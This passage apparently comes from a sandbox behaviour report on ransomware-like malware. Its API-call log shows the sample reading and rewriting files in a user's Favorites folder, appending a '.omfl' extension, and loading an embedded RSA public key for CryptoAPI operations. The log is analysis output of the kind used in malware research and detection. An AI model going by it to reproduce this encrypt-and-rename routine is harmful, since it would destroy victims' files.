lpMem=0xdd17478 | out: hHeap=0x4970000) returned 1 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17490 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17478 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17478 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.522] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.522] GetCurrentThreadId () returned 0x618 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579c20 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.522] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.523] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.523] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.523] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.523] CloseHandle (hObject=0x610) returned 1 [0132.582] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.omfl")) returned 1 [0132.583] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.583] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.583] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.585] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0132.585] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0132.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0132.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.586] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.589] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.589] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.597] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.597] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.598] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.598] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.598] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.598] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.598] GetLastError () returned 0x0 [0132.598] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.598] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.598] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.599] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.599] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.599] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.599] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174a8 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17490 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.599] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.600] GetCurrentThreadId () returned 0x618 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579cb0 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.600] GetCurrentThreadId () returned 0x618 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.600] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17490 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174a8 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17478 [0132.601] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd174c0 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17490 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.602] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17490 | out: hHeap=0x4970000) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174c0 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd174a8 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17478 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.603] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17460 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbcb8 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.604] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.604] 